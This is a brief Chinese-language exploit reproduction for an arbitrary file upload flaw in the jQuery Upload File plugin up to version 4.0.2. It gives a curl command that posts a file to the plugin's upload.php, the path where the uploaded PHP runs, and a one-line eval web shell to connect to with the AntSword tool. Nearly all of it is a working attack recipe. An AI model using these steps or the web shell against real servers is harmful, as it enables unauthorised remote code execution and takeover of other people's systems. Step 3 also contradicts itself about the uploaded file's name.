漏洞描述:
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Upload File <= 4.0.2 中的任意文件上传 根目录下/jquery-upload-file。
复现过程:
1.访问ip:port
2.准备好phpinfo.php文件,在文件目录下cmd
<?php phpinfo(); ?>
3.通过crul命令上传木马文件phpinfo.php
curl -F "myfile=@shell.php" "http://ip:port/jquery-upload-file/php/upload.php"
4.打开文件位置正常解析php文件
http://ip:port/jquery-upload-file/php/uploads/phpinfo.php
5.Getshell
<?php @eval($_POST['cmd']);?>
6.蚁剑连接